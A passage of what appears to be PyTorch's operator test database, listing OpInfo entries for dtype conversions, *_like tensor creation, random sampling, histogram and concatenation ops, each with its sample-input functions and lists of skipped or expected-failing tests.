torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('long', op=lambda x, *args, **kwargs: x.long(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('short', op=lambda x, *args, **kwargs: x.short(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('chalf', op=lambda x, *args, **kwargs: x.chalf(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), # use of lambda doesn't work with test_normalize_operator_exhaustive DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: "index_select" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_noncontiguous_samples', dtypes=(torch.float, torch.cfloat)), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager', device_type='cpu'), # TypeError: 'int' object is not iterable DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view', device_type='cpu'), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view', device_type='cpu'), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' # RuntimeError: "neg_conj_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), ) ), OpInfo('empty_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_like_fns, reference_inputs_func=reference_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # Empty tensor data is garbage so it's hard to make comparisons with it. 
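# (torch.empty_like returns uninitialized memory -- e.g. torch.empty_like(torch.ones(2))
#  may hold arbitrary values -- hence every value-comparing test below is skipped.)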
DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_complex_half_reference_testing'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('zeros_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('ones_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('randn_like', dtypes=floating_types_and(torch.half, torch.bfloat16, torch.complex32, torch.complex64, torch.complex128), op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.randn_like, inp, *args, **kwargs), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, supports_sparse_csr=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Expected: randn_like is not comparable between dtypes"), 'TestCommon', 'test_complex_half_reference_testing'), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), )), OpInfo('rand_like', dtypes=floating_types_and(torch.half, torch.bfloat16, torch.complex32, torch.complex64, torch.complex128), op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.randn_like, inp, *args, **kwargs), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 
'test_variant_consistency_jit'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), DecorateInfo(unittest.skip("Expected: rand_like is not comparable between dtypes"), 'TestCommon', 'test_complex_half_reference_testing'), )), OpInfo('randint_like', dtypes=all_types_and(torch.half, torch.bfloat16), op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.randint_like, inp, *args, **kwargs), supports_out=False, sample_inputs_func=sample_inputs_randint_like, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('full_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_full_like, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('new_zeros', op=lambda x, *args, **kwargs: x.new_zeros(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_fns, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), supports_autograd=False), OpInfo('new_ones', op=lambda x, *args, **kwargs: x.new_ones(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_fns, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), supports_autograd=False), OpInfo('new_empty', op=lambda x, *args, **kwargs: x.new_empty(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_fns, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # Empty tensor data is garbage so it's hard to make comparisons with it.
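# (The new_* methods above inherit dtype and device from self by default, e.g.
#  x.new_zeros(3) matches x.dtype and x.device, which is why they can share the
#  sample_inputs_new_fns sampler.)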
DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), DecorateInfo(unittest.skip("Expected: new_empty is not comparable"), 'TestCommon', 'test_complex_half_reference_testing'), ), supports_autograd=False), OpInfo('empty', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_empty, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), # Empty tensor data is garbage so it's hard to make comparisons with it. 
DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestLazyOpInfo'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_complex_half_reference_testing'), )), OpInfo('new_full', op=lambda x, *args, **kwargs: x.new_full(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_full, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), supports_autograd=False), OpInfo('multinomial', op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.multinomial, inp, *args, **kwargs), method_variant=lambda inp, *args, **kwargs: wrapper_set_seed(torch.Tensor.multinomial, inp, *args, **kwargs), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), supports_out=True, sample_inputs_func=sample_inputs_multinomial, error_inputs_func=error_inputs_multinomial, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Strides are not the same! # This may not be reproducible in CI DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning')), supports_autograd=False), OpInfo('normal', op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.normal, inp, *args, **kwargs), # The inplace variant (Tensor.normal_) is different from torch.normal inplace_variant=None, dtypes=floating_types_and(torch.bfloat16, torch.half), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.half), supports_out=True, sample_inputs_func=sample_inputs_normal_tensor_first, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Tensor-likes are not close! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. 
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # NotImplementedError not raised DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), # Computed gradient is incorrect -- would be an xfail but gradgrad somehow passes DecorateInfo(unittest.skip("Gradients are incorrect!"), 'TestGradients'),)), OpInfo('normal', # This has its own variant b/c OpInfos assume the first arg is a Tensor but it is not here variant_test_name='number_mean', op=lambda std, mean, *args, **kwargs: wrapper_set_seed(torch.normal, mean, std, *args, **kwargs), # The inplace variant (Tensor.normal_) is different from torch.normal inplace_variant=None, dtypes=floating_types_and(torch.bfloat16, torch.half), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.half), supports_out=True, sample_inputs_func=sample_inputs_normal_tensor_second, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # NotImplementedError not raised DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), # Computed gradient is incorrect -- would be an xfail but gradgrad somehow passes DecorateInfo(unittest.skip("Gradients are incorrect!"), 'TestGradients'),)), OpInfo('bernoulli', op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.bernoulli, inp, *args, **kwargs), # The inplace variant (Tensor.bernoulli_) is different from torch.bernoulli inplace_variant=None, method_variant=lambda inp, *args, **kwargs: wrapper_set_seed(torch.Tensor.bernoulli, inp, *args, **kwargs), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.half), supports_out=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_bernoulli, skips=( # vmap: We do not yet support calling random operations inside of vmap DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Expected RuntimeError when doing an unsafe cast from a result of # dtype torch.float32 into an out= with dtype torch.long DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it.
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'))), OpInfo('scatter_add', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_add, error_inputs_func=error_inputs_scatter_and_scatter_add, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('stack', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_stack, assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # https://github.com/pytorch/pytorch/issues/77046 DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), ), ), OpInfo('hstack', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_hstack_dstack_vstack, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), BinaryUfuncInfo('hypot', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False), OpInfo('histogram', dtypes=floating_types(), dtypesIfCUDA=_dispatch_dtypes(), # histogram is only implemented on CPU sample_inputs_func=sample_inputs_histogram, supports_autograd=False, skips=( # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 # RuntimeError: # undefined value tensor: # File "<string>", line 3 # def the_method(i0): # return torch.histogram(i0, 1, weight=tensor(-0.5735, dtype=torch.float32), density=False) # ~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Not Implemented on XLA. 
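# DecorateInfo accepts optional scoping arguments: device_type restricts a decorator
# to one backend, dtypes to particular dtypes, and active_if makes it conditional.
# Illustrative only, with hypothetical test names:
#   DecorateInfo(unittest.skip("..."), 'TestFoo', 'test_bar', active_if=IS_WINDOWS)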
DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla'), )), OpInfo('histogramdd', dtypes=floating_types(), dtypesIfCUDA=_dispatch_dtypes(), # histogramdd is only implemented on CPU sample_inputs_func=sample_inputs_histogramdd, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('histc', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64), sample_inputs_func=sample_inputs_histc, supports_out=True, supports_autograd=False, skips=( # CUDA histc returns a float tensor but does not correctly warn when passed an integral out tensor # "AssertionError: RuntimeError not raised : Expected RuntimeError when doing an unsafe cast # from a result of dtype torch.float32 into an out= with dtype torch.long" DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cuda'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), )), OpInfo('bincount', dtypes=integral_types_and(), sample_inputs_func=sample_inputs_bincount, supports_out=False, supports_autograd=False, skips=( # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('bucketize', dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), sample_inputs_func=sample_inputs_bucketize, supports_autograd=False, skips=( # JIT tests don't work with Tensor keyword arguments DecorateInfo(unittest.skip("Expected failure!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('searchsorted', dtypes=all_types_and(torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and(torch.float16), sample_inputs_func=sample_inputs_searchsorted, supports_autograd=False, ref=reference_searchsorted, skips=( # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 DecorateInfo(unittest.skip("Expected failure!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('cat', ref=_cat_np, aliases=('concat',), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.complex32), sample_inputs_func=sample_inputs_cat_concat, reference_inputs_func=reference_inputs_cat, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, skips=( # RuntimeError: Arguments for call not valid. # Expected a value of type 'List[Tensor]' for argument # 'tensors' but instead found type 'Tensor (inferred)'. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), # see https://github.com/pytorch/pytorch/issues/71286 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness'),)), OpInfo('vstack', aliases=('row_stack',), dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_hstack_dstack_vstack, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # RuntimeError: _fn() Expected a value of type # 'Tensor (inferred)' for argument 't0' but instead found type 'tuple'. 
DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'),)), OpInfo('dstack', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_hstack_dstack_vstack, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('unfold', op=lambda x, *args: x.unfold(*args), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), backward_dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Skip operator schema test because this is a functional and not an operator DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), sample_inputs_func=sample_inputs_unfold), OpInfo('msort', dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_msort), OpInfo('movedim', aliases=('moveaxis',), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_movedim_moveaxis), OpInfo('renorm', dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_renorm, error_inputs_func=error_inputs_renorm), ShapeFuncInfo('repeat', op=lambda x, dims: x.repeat(dims), ref=np.tile, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_repeat_tile, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('squeeze', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, assert_autodiffed=True, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_squeeze), UnaryUfuncInfo( 'fill', op=_fill_aten, ref=_fill_np, method_variant=None, inplace_variant=torch.Tensor.fill_, sample_kwargs=_fill_sample_kwargs, sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'value': True}), supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, skips=( # JIT has issue when op is passed as lambda # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 
'test_backward'), DecorateInfo(unittest.skip("No fill_ op"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("No fill_ op"), 'TestNNCOpInfo'), )), OpInfo('resize_', op=lambda x, shape: x.clone().resize_(shape), method_variant=None, inplace_variant=torch.Tensor.resize_, # the test fails because resize_ doesn't work with imag views as expected by the test # https://github.com/pytorch/pytorch/issues/65945 test_neg_view=False, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_autograd=False, skips=( # Cannot resize variables that require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.skip("Allowed exception"), 'TestCompositeCompliance', 'test_operator'), ), sample_inputs_func=sample_inputs_resize_ops), OpInfo('resize_as_', op=lambda x, other: torch.resize_as_(x.clone(), other), method_variant=None, inplace_variant=torch.Tensor.resize_as_, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_autograd=False, skips=( # Cannot resize variables that require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), ), sample_inputs_func=sample_inputs_resize_ops), OpInfo('take_along_dim', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_take_along_dim, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), ShapeFuncInfo('tile', ref=np.tile, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_repeat_tile), OpInfo('trapz', # TODO: in the future, 'trapz' should be made a proper alias of 'trapezoid' dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_trapezoid), OpInfo('trapezoid', dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_trapezoid), OpInfo('cumulative_trapezoid', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bfloat16, torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=sample_cumulative_trapezoid,), OpInfo('unsqueeze', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, assert_jit_shape_analysis=True, assert_autodiffed=True, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused sample_inputs_func=sample_unsqueeze), BinaryUfuncInfo('xlogy', aliases=('special.xlogy',), dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_one_python_scalar=True, skips=( # nan vs nan comparisons # 
